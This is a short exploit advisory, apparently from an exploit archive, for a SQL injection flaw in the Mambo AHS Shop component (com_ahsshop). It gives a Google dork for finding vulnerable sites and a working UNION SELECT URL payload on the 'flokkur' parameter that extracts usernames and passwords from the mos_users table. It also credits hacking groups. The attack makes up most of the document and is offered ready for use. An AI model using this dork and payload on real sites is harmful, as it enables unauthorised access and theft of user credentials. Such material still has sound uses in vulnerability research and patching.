The Mambo AHS Shop component suffers from a remote SQL injection vulnerability.
ef6cc291b84f91bfbb63b85556b4d62603fb1b707ea58b563bdc2a99cc20592f
------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_ahsshop SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_ahsshop
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: https://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------
Exploit
https://localhost/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users
------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
------------------------------------------------------------------------------------------------------